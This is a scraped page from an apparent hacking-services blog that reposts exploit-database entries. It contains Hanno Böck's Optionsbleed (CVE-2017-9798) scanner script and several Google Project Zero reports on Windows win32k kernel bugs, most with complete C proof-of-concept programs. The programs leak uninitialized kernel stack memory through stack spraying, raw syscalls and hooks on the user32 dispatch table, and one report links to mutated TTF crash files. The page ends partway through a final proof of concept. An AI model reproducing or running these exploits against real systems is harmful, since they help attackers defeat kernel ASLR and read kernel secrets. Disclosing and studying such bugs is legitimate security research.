#!/usr/bin/env python3
# Optionsbleed proof of concept test
# by Hanno Böck
import argparse
import urllib3
import re
def test_bleed(url, args):
r = pool.request('OPTIONS', url)
try:
allow = str(r.headers["Allow"])
except KeyError:
return False
if allow in dup:
return
dup.append(allow)
if allow == "":
print("[empty] %s" % (url))
elif re.match("^[a-zA-Z]+(-[a-zA-Z]+)? *(, *[a-zA-Z]+(-[a-zA-Z]+)? *)*$", allow):
z = [x.strip() for x in allow.split(',')]
if len(z) > len(set(z)):
print("[duplicates] %s: %s" % (url, repr(allow)))
elif args.all:
print("[ok] %s: %s" % (url, repr(allow)))
elif re.match("^[a-zA-Z]+(-[a-zA-Z]+)? *( +[a-zA-Z]+(-[a-zA-Z]+)? *)+$", allow):
print("[spaces] %s: %s" % (url, repr(allow)))
else:
print("[bleed] %s: %s" % (url, repr(allow)))
return True
parser = argparse.ArgumentParser(
description='Check for the Optionsbleed vulnerability (CVE-2017-9798).',
epilog="Tests server for Optionsbleed bug and other bugs in the allow header.\n\n"
"Autmatically checks http://, https://, http://www. and https://www. -\n"
"except if you pass -u/--url (which means by default we check 40 times.)\n\n"
"Explanation of results:\n"
"[bleed] corrupted header found, vulnerable\n"
"[empty] empty allow header, does not make sense\n"
"[spaces] space-separated method list (should be comma-separated)\n"
"[duplicates] duplicates in list (may be apache bug 61207)\n"
"[ok] normal list found (only shown with -a/--all)\n",
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('hosttocheck', action='store',
help='The hostname you want to test against')
parser.add_argument('-n', nargs=1, type=int, default=[10],
help='number of tests (default 10)')
parser.add_argument("-a", "--all", action="store_true",
help="show headers from hosts without problems")
parser.add_argument("-u", "--url", action='store_true',
help="pass URL instead of hostname")
args = parser.parse_args()
howoften = int(args.n[0])
dup = []
# Note: This disables warnings about the lack of certificate verification.
# Usually this is a bad idea, but for this tool we want to find vulnerabilities
# even if they are shipped with invalid certificates.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
pool = urllib3.PoolManager(10, cert_reqs='CERT_NONE')
if args.url:
test_bleed(args.hosttocheck, args)
else:
for prefix in ['http://', 'http://www.', 'https://', 'https://www.']:
for i in range(howoften):
try:
if test_bleed(prefix+args.hosttocheck, args) is False:
break
except Exception as e:
pass
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863149431
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1274
We have encountered a number of Windows kernel crashes in the win32k.sys driver while processing corrupted TTF font files:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff1effff, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 91a65a52, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
FAULTING_IP:
win32k!fsc_CalcGrayRow+87
91a65a52 660fbe4fff movsx cx,byte ptr [edi-1]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
LAST_CONTROL_TRANSFER: from 91a65990 to 91a65a52
STACK_TEXT:
981a885c 91a65990 ff1f83f8 ff1f8140 ff1f83a8 win32k!fsc_CalcGrayRow+0x87
981a88a0 919e26ac 00000008 ff1f8010 fbb36e78 win32k!fsc_CalcGrayMap+0x105
981a88e8 91b69e1a ff1f8010 ff1f807c 00000005 win32k!fs_ContourScan+0x582
981a89f4 91b69ef2 00000000 00000005 981a8b08 win32k!lGGOBitmap+0x15f
981a8a1c 919dd4f0 fbb36e78 00000005 981a8b08 win32k!ttfdGlyphBitmap+0x60
981a8a40 919dd386 fc23ccf0 00000009 00000005 win32k!ttfdQueryFontData+0x115
981a8a90 919dc5b2 00000000 fc23ccf0 00000009 win32k!ttfdSemQueryFontData+0x45
981a8ad8 91b351b4 00000000 fc23ccf0 00000009 win32k!PDEVOBJ::QueryFontData+0x3e
981a8b90 91b2cd60 fc23ccf0 fc23ccf0 00000006 win32k!GreGetGlyphOutlineInternal+0x534
981a8c0c 8288587a 04010215 00000022 00000006 win32k!NtGdiGetGlyphOutline+0x95
981a8c0c 76f370b4 04010215 00000022 00000006 nt!KiFastCallEntry+0x12a
WARNING: Frame IP not in any known module. Following frames may be wrong.
0020f504 00000000 00000000 00000000 00000000 0x76f370b4
---
The above crash dump comes from an old version of Windows 7 32-bit, because symbols for win32k.sys on the latest build are currently unavailable on the Microsoft Symbol Server. Nevertheless, a crash summary from an up-to-date system is as follows:
--- cut ---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff1e3fff, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 91ce9382, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
FAULTING_IP:
win32k!EngDeleteClip+4883
91ce9382 660fbe4fff movsx cx,byte ptr [edi-1]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
LAST_CONTROL_TRANSFER: from 91ce92c0 to 91ce9382
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
9aa98858 91ce92c0 ff1ee3f8 ff1ee140 ff1ee3a8 win32k!EngDeleteClip+0x4883
9aa9889c 91c64346 00000008 ff1ee010 fb9dce78 win32k!EngDeleteClip+0x47c1
9aa988e4 91dfa025 ff1ee010 ff1ee07c 00000005 win32k!XFORMOBJ_iGetXform+0x5864
9aa989f0 91dfa0fd 00000000 00000005 9aa98b04 win32k!XLATEOBJ_hGetColorTransform+0x40a1c
9aa98a18 91c5f086 fb9dce78 00000005 9aa98b04 win32k!XLATEOBJ_hGetColorTransform+0x40af4
9aa98a3c 91c5ef1c fc22ccf0 00000009 00000005 win32k!XFORMOBJ_iGetXform+0x5a4
9aa98a8c 91c5e138 00000000 fc22ccf0 00000009 win32k!XFORMOBJ_iGetXform+0x43a
9aa98ad4 91dc3424 00000000 fc22ccf0 00000009 win32k!EngCTGetGammaTable+0xc967
9aa98b90 91dbafcc fc22ccf0 fc22ccf0 00000006 win32k!XLATEOBJ_hGetColorTransform+0x9e1b
9aa98c0c 82888986 0c0104d1 00000022 00000006 win32k!XLATEOBJ_hGetColorTransform+0x19c3
9aa98c0c 77986c74 0c0104d1 00000022 00000006 nt!KiSystemServicePostCall
001cf4ac 00000000 00000000 00000000 00000000 0x77986c74
--- cut ---
While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "glyf" table.
The issue reproduces on Windows 7 (other platforms untested). It is easiest to reproduce with Special Pools enabled for win32k.sys. In order to reproduce the problem with the provided samples, it is necessary to use a custom program which calls the GetGlyphOutline() API with various parameters over all of the font's glyphs.
Attached is an archive with several proof-of-concept mutated TTF files.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42746.zip
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1275
We have discovered that the nt!NtGdiGetFontResourceInfoInternalW system call discloses portions of uninitialized kernel stack memory to user-mode clients.
This is caused by the fact that for user-specified output buffer sizes up to 0x5c, a temporary stack-based buffer is used by the syscall for optimization. As opposed to the pool allocation, the stack memory area is not pre-initialized with zeros, and when it is copied back to user-mode in its entirety, its contents disclose leftover kernel stack bytes containing potentially sensitive information.
The vulnerability is fixed in Windows 10, which has the following memset() call at the beginning of the function:
--- cut ---
.text:0025F9E6 push 5Ch ; size_t
.text:0025F9E8 push ebx ; int
.text:0025F9E9 lea eax, [ebp+var_118]
.text:0025F9EF push eax ; void *
.text:0025F9F0 call _memset
--- cut ---
This indicates that Microsoft is aware of the bug but didn't backport the fix to systems earlier than Windows 10. The issue was in fact discovered by cross-diffing the list of memset calls between Windows 7 and Windows 10, which illustrates how easy it is to use exclusive patches for one system version to attack another.
The attached proof-of-concept program demonstrates the disclosure. An example output is as follows:
--- cut ---
00000000: 00 00 00 00 a9 fb c2 82 02 00 00 00 19 00 00 00 ................
00000010: 00 00 00 00 46 69 6c 65 a8 6f 06 89 46 69 6c 65 ....File.o..File
00000020: c8 00 00 00 ff 07 00 00 00 00 00 00 00 30 06 89 .............0..
00000030: 00 08 00 00 46 02 00 00 68 72 b8 93 d0 71 b8 93 ....F...hr...q..
00000040: a8 71 b8 93 00 8b 2e 9a 98 a8 a2 82 68 8b 2e 9a .q..........h...
00000050: fa a8 a2 82 a8 71 b8 93 46 69 6c e5 ?? ?? ?? ?? .....q..Fil.....
--- cut ---
Only the first four bytes of the data are properly initialized to 0x00, while the rest are visibly leaked from the kernel stack and contain a multitude of kernel-space addresses, readily facilitating exploitation of other memory corruption vulnerabilities.
The bug is limited to leaking at most ~0x5c bytes at a time, as specifying a larger size will provoke a correctly padded pool allocation instead of the stack-based buffer.
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
// Undocumented definitions for the gdi32!GetFontResourceInfoW function.
typedef BOOL(WINAPI *PGFRI)(LPCWSTR, LPDWORD, LPVOID, DWORD);
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
int main() {
// Resolve the GDI32!GetFontResourceInfoW symbol.
HINSTANCE hGdi32 = LoadLibrary(L"gdi32.dll");
PGFRI GetFontResourceInfo = (PGFRI)GetProcAddress(hGdi32, "GetFontResourceInfoW");
// Trigger the vulnerability and dump kernel stack output. The code assumes that Windows is
// installed on partition C:\ and the C:\Windows\Fonts\arial.ttf font is present on disk.
BYTE OutputBuffer[0x5c] = { /* zero padding */ };
DWORD OutputSize = sizeof(OutputBuffer);
if (!GetFontResourceInfo(L"C:\\Windows\\Fonts\\arial.ttf", &OutputSize, OutputBuffer, 5)) {
printf("GetFontResourceInfo failed.\n");
return 1;
}
PrintHex(OutputBuffer, sizeof(OutputBuffer));
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1276&desc=2
We have discovered that the nt!NtGdiEngCreatePalette system call discloses large portions of uninitialized kernel stack memory to user-mode clients.
This is caused by the fact that for palettes created in the PAL_INDEXED mode with up to 256 colors, a temporary stack-based buffer is used by the syscall for optimization (instead of locking the entire ring-3 memory area with win32k!bSecureBits). The stack memory region is not pre-initialized with zeros, but its contents may still be treated as valid palette colors by win32k!EngCreatePalette, in the special corner case when:
a) 1 <= cColors <= 256
b) pulColors == NULL
The above setting causes the the win32k!bSafeReadBits to automatically succeed without actually reading any data from user-space, which further leads to the creation of a palette with colors set to uninitialized memory from the kernel stack (up to 1024 bytes!). These bytes can be subsequently read back using the GetPaletteEntries() API.
The vulnerability is fixed in Windows 8 and 10, which have the following memset() calls at the beginning of the function:
(Windows 8.1)
--- cut ---
.text:001B4B62 push 3FCh ; size_t
.text:001B4B67 lea eax, [ebp+var_400]
.text:001B4B6D mov [ebp+var_404], edi
.text:001B4B73 push edi ; int
.text:001B4B74 push eax ; void *
.text:001B4B75 call _memset
--- cut ---
(Windows 10)
--- cut ---
.text:002640C8 push 400h ; size_t
.text:002640CD mov [ebp+var_410], eax
.text:002640D3 lea eax, [ebp+var_404]
.text:002640D9 push edi ; int
.text:002640DA push eax ; void *
.text:002640DB mov [ebp+var_41C], ebx
.text:002640E1 call _memset
--- cut ---
This indicates that Microsoft is aware of the bug but didn't backport the fix to systems earlier than Windows 8. The issue was in fact discovered by cross-diffing the list of memset calls between Windows 7 and Windows 10, which illustrates how easy it is to use exclusive patches for one system version to attack another.
The attached proof-of-concept program demonstrates the disclosure by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call. An example output is as follows:
--- cut ---
00000000: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000010: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000040: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000050: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000060: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000070: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000080: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000090: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000100: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000110: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000120: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000130: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000140: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000150: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000160: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000170: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000180: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000190: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000200: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000210: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000230: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000240: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000250: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000260: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000270: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000280: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000290: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000300: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000310: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000320: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000330: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000340: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000350: 41 41 41 41 41 41 41 41 41 41 41 41 00 00 00 00 AAAAAAAAAAAA....
00000360: 21 00 00 00 00 00 00 00 88 0d cf 8e da 3f 87 82 !............?..
00000370: 09 50 14 00 04 00 00 00 00 dc 9d 98 25 82 5e 4d .P..........%.^M
00000380: 00 00 00 00 f0 dd 9d 98 d0 09 96 82 12 01 00 00 ................
00000390: 48 0d cf 8e 00 00 00 00 ae 01 00 00 6f 00 00 00 H...........o...
000003a0: 00 00 00 00 7e 53 0c 00 1c fc 1c 9a a5 f0 87 82 ....~S..........
000003b0: ef ff 07 00 12 01 00 00 40 58 14 00 cc f2 41 00 ........@X....A.
000003c0: 01 00 00 00 01 00 00 00 f0 dd 9d 98 00 00 00 00 ................
000003d0: 12 01 00 00 00 00 00 00 14 05 00 c0 25 82 5e 4d ............%.^M
000003e0: 00 00 00 00 00 00 00 00 00 10 00 00 6c fb 1c 9a ............l...
000003f0: 2c f9 1c 9a 67 08 00 00 67 08 00 00 48 0d cf 8e ,...g...g...H...
--- cut ---
The planted 0x41 bytes are clearly visible in the above hex dump. Since the stack spraying primitive used here (nt!NtMapUserPhysicalPages) still leaves some bytes intact at higher addresses, these bytes (containing a number of kernel-space addresses etc.) can be observed at offsets 0x360-0x400.
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <winddi.h>
#include <cstdio>
extern "C"
NTSTATUS WINAPI NtMapUserPhysicalPages(
PVOID BaseAddress,
ULONG NumberOfPages,
PULONG PageFrameNumbers
);
// For native 32-bit execution.
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
VOID MyMemset(PVOID ptr, BYTE byte, ULONG size) {
PBYTE _ptr = (PBYTE)ptr;
for (ULONG i = 0; i < size; i++) {
_ptr[i] = byte;
}
}
VOID SprayKernelStack() {
// Buffer allocated in static program memory, hence doesn't touch the local stack.
static SIZE_T buffer[1024];
// Fill the buffer with 'A's and spray the kernel stack.
MyMemset(buffer, 'A', sizeof(buffer));
NtMapUserPhysicalPages(buffer, ARRAYSIZE(buffer), (PULONG)buffer);
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
MyMemset(buffer, 'B', sizeof(buffer));
}
int main() {
// Windows 7 32-bit.
CONST ULONG __NR_NtGdiEngCreatePalette = 0x129c;
// Initialize the thread as GUI.
LoadLibrary(L"user32.dll");
// Fill the kernel stack with some marker 'A' bytes.
SprayKernelStack();
// Create a Palette object with 256 4-byte uninitialized colors from the kernel stack.
HPALETTE hpal = (HPALETTE)SystemCall32(__NR_NtGdiEngCreatePalette, PAL_INDEXED, 256, NULL, 0.0f, 0.0f, 0.0f);
if (hpal == NULL) {
printf("[-] NtGdiEngCreatePalette failed.\n");
return 1;
}
// Retrieve the uninitialized bytes back to user-mode.
PALETTEENTRY palentries[256] = { /* zero padding */ };
if (GetPaletteEntries(hpal, 0, 256, palentries) != 256) {
printf("[-] GetPaletteEntries failed.\n");
return 1;
}
// Dump the data on screen.
PrintHex((PBYTE)palentries, sizeof(palentries));
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1304
We have discovered that the win32k!NtGdiDoBanding system call discloses portions of uninitialized kernel stack memory to user-mode clients.
More specifically, exactly 8 bytes of uninitialized kernel stack memory are copied to ring-3 in one of two execution contexts (unique stack traces):
--- 1 ---
#0 win32k.sys!memcpy+00000033
#1 win32k.sys!UMPDOBJ::ThunkMemBlock+00000047
#2 win32k.sys!UMPDDrvStartBanding+000000b1
#3 win32k.sys!GreDoBanding+000000ad
#4 win32k.sys!NtGdiDoBanding+0000001f
#5 ntoskrnl.exe!KiSystemServicePostCall+00000000
--- 1 ---
... and ...
--- 2 ---
#0 win32k.sys!memcpy+00000033
#1 win32k.sys!UMPDOBJ::ThunkMemBlock+00000047
#2 win32k.sys!UMPDDrvNextBand+000000b1
#3 win32k.sys!GreDoBanding+0000011e
#4 win32k.sys!NtGdiDoBanding+0000001f
#5 ntoskrnl.exe!KiSystemServicePostCall+00000000
--- 2 ---
The names and offsets are specific to Windows 7 32-bit from February 2017, as symbols for the latest win32k.sys are not available from the Microsoft Symbol Server at the moment. The leaked bytes origin from the stack frame of the win32k!NtGdiDoBanding function (top-level syscall handler), and a pointer to the uninitialized buffer is passed down to win32k!GreDoBanding in the third argument.
The attached proof-of-concept program can be used to reproduce the vulnerability on Windows 7 32-bit. On our test virtual machine, the output is as follows:
--- cut ---
[+] Leaked data: 00000bf8 00460000
[+] Leaked data: ff9ed130 969e68ad
[+] Leaked data: ff9ed130 969e68ad
[+] Leaked data: ff9ed130 969e68ad
...
--- cut ---
As it turns out, 0xff9ed130 is a valid paged session pool address, and 0x969e68ad is a valid code address within win32k.sys:
--- cut ---
3: kd> !pool ff9ed130
Pool page ff9ed130 region is Paged session pool
ff9ed000 size: 118 previous size: 0 (Allocated) Usqu
*ff9ed118 size: ee8 previous size: 118 (Allocated) *GDev
Pooltag GDev : Gdi pdev
3: kd> u 969e68ad
win32k!EngReleaseSemaphore+0x2f6:
969e68ad c3 ret
969e68ae 90 nop
969e68af 90 nop
969e68b0 90 nop
969e68b1 90 nop
969e68b2 90 nop
969e68b3 8bff mov edi,edi
969e68b5 55 push ebp
--- cut ---
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
namespace globals {
LPVOID(WINAPI *OrigClientPrinterThunk)(LPVOID);
} // namespace globals
PVOID *GetUser32DispatchTable() {
__asm {
mov eax, fs:30h
mov eax, [eax + 0x2c]
}
}
BOOL HookUser32DispatchFunction(UINT Index, PVOID lpNewHandler, PVOID *lpOrigHandler) {
PVOID *DispatchTable = GetUser32DispatchTable();
DWORD OldProtect;
if (!VirtualProtect(DispatchTable, 0x1000, PAGE_READWRITE, &OldProtect)) {
printf("VirtualProtect#1 failed, %d\n", GetLastError());
return FALSE;
}
*lpOrigHandler = DispatchTable[Index];
DispatchTable[Index] = lpNewHandler;
if (!VirtualProtect(DispatchTable, 0x1000, OldProtect, &OldProtect)) {
printf("VirtualProtect#2 failed, %d\n", GetLastError());
return FALSE;
}
return TRUE;
}
LPVOID WINAPI ClientPrinterThunkHook(LPVOID Data) {
LPDWORD DwordData = (LPDWORD)Data;
if (DwordData[0] == 0x1c && (DwordData[1] == 0x39 || DwordData[1] == 0x3a)) {
LPDWORD LeakedData = (LPDWORD)DwordData[6];
printf("[+] Leaked data: %.8x %.8x\n", LeakedData[0], LeakedData[1]);
}
return globals::OrigClientPrinterThunk(Data);
}
int main() {
// Hook the user32!ClientPrinterThunk callback.
if (!HookUser32DispatchFunction(93, ClientPrinterThunkHook, (PVOID *)&globals::OrigClientPrinterThunk)) {
printf("Hooking ClientPrinterThunk failed.\n");
return 1;
}
// Obtain a print job DC.
PRINTDLGA pd = { 0 };
pd.lStructSize = sizeof(pd);
pd.Flags = PD_RETURNDEFAULT | PD_ALLPAGES | PD_RETURNDC | PD_PRINTTOFILE;
pd.nFromPage = 1;
pd.nToPage = 1;
pd.nCopies = 1;
if (!PrintDlgA(&pd)) {
printf("PrintDlgA failed.\n");
return 1;
}
// Initialize the print job.
DOCINFOA doc_info = { 0 };
doc_info.cbSize = sizeof(doc_info);
doc_info.lpszDocName = "Document";
doc_info.lpszOutput = "C:\\Windows\\Temp\\output";
if (StartDocA(pd.hDC, &doc_info) <= 0) {
printf("StartDoc failed.\n");
return 1;
}
if (StartPage(pd.hDC) <= 0) {
printf("StartPage failed.\n");
return 1;
}
//
// The bug is triggered here.
//
EndPage(pd.hDC);
// Free resources.
EndDoc(pd.hDC);
DeleteDC(pd.hDC);
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1307
We have discovered that the win32k!NtQueryCompositionSurfaceBinding system call discloses portions of uninitialized kernel stack memory to user-mode clients, as tested on Windows 10 32-bit.
The output buffer, and the corresponding temporary stack-based buffer in the kernel are 0x308 bytes in size. The first 4 and the trailing 0x300 bytes are zero'ed out at the beginning of the function:
--- cut ---
.text:0001939B mov [ebp+var_324], ebx
.text:000193A1 push 300h ; size_t
.text:000193A6 push ebx ; int
.text:000193A7 lea eax, [ebp+var_31C]
.text:000193AD push eax ; void *
.text:000193AE call _memset
--- cut ---
However, the remaining 4 bytes at offset 0x4 are never touched, and so they contain whatever data was written there by the previous system call. These 4 bytes are then subsequently leaked to the user-mode caller. Exploitation of this bug is further facilitated by the fact that the contents of the buffer are copied back to user-mode even if the syscall fails (e.g. composition surface handle can't be resolved etc).
The attached proof-of-concept program demonstrates the disclosure by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call. An example output is as follows:
--- cut ---
00000000: 00 00 00 00 41 41 41 41 00 00 00 00 00 00 00 00 ....AAAA........
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
[...]
000002b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000300: 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ................
--- cut ---
It is clearly visible here that among all data copied from ring-0 to ring-3, 4 bytes at offset 0x4 remained uninitialized. Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
extern "C"
ULONG WINAPI NtMapUserPhysicalPages(
PVOID BaseAddress,
ULONG NumberOfPages,
PULONG PageFrameNumbers
);
// For native 32-bit execution.
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
